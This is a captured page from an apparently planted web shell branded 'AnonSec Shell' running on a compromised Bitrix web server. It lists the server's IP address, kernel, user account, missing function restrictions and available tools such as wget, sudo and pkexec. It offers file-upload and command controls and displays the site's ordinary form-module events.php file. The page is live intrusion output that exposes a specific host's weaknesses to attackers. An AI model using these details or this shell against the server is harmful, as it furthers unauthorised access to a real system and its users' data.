AnonSec Shell
Server IP : 85.193.89.191  /  Your IP : 3.143.204.127
Web Server : Apache
System : Linux 956367-cx40159.tmweb.ru 3.10.0-1160.105.1.el7.x86_64 #1 SMP Thu Dec 7 15:39:45 UTC 2023 x86_64
User : bitrix ( 600)
PHP Version : 8.1.27
Disable Function : NONE
MySQL : OFF  |  cURL : OFF  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/bitrix/www/bitrix/modules/form/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     

Current File : /home/bitrix/www/bitrix/modules/form/events.php
<?php

class CFormEventHandlers
{
	public static function sendOnAfterResultStatusChange($WEB_FORM_ID, $RESULT_ID, $NEW_STATUS_ID = false, $CHECK_RIGHTS = 'Y')
	{
		$NEW_STATUS_ID = intval($NEW_STATUS_ID);
	
		$dbRes = CForm::GetByID($WEB_FORM_ID);
		if (!$arForm = $dbRes->Fetch())
			return;
		
		CTimeZone::Disable();
		$dbRes = CFormResult::GetByID($RESULT_ID);
		CTimeZone::Enable();

		if (!($arResult = $dbRes->Fetch()) || !$arResult['USER_ID'])
			return;
		
		$dbRes = CUser::GetByID($arResult['USER_ID']);
		if (!($arUser = $dbRes->Fetch()))
			return;
		
		if (!$NEW_STATUS_ID)
			$NEW_STATUS_ID = CFormStatus::GetDefault($WEB_FORM_ID);
		
		$dbRes = CFormStatus::GetByID($NEW_STATUS_ID);
		if (!($arStatus = $dbRes->Fetch()) || $arStatus['MAIL_EVENT_TYPE'] == '')
			return;

		$arTemplates = CFormStatus::GetMailTemplateArray($NEW_STATUS_ID);
		if (!is_array($arTemplates) || count($arTemplates) <= 0)
			return;
			
		$arEventFields = array(
			"EMAIL_TO"				=> $arUser['EMAIL'],
			"RS_FORM_ID"			=> $arForm["ID"],
			"RS_FORM_NAME"			=> $arForm["NAME"],
			"RS_FORM_VARNAME"		=> $arForm["SID"],
			"RS_FORM_SID"			=> $arForm["SID"],
			"RS_RESULT_ID"			=> $arResult["ID"],
			"RS_DATE_CREATE"		=> $arResult["DATE_CREATE"],
			"RS_USER_ID"			=> $arResult['USER_ID'],
			"RS_USER_EMAIL"			=> $arUser['EMAIL'],
			"RS_USER_NAME"			=> $arUser["NAME"]." ".$arUser["LAST_NAME"],
			"RS_STATUS_ID"			=> $arStatus["ID"],
			"RS_STATUS_NAME"		=> $arStatus["TITLE"],
		);
		
		$dbRes = CEventMessage::GetList("id", "asc", array(
			'ID' => $arTemplates,
			"ACTIVE"		=> "Y",
			"EVENT_NAME"	=> $arStatus["MAIL_EVENT_TYPE"]
		));
		
		while ($arTemplate = $dbRes->Fetch())
			CEvent::Send($arTemplate["EVENT_NAME"], $arTemplate["SITE_ID"], $arEventFields, "Y", $arTemplate["ID"]);
	}
}

Anon7 - 2022
AnonSec Team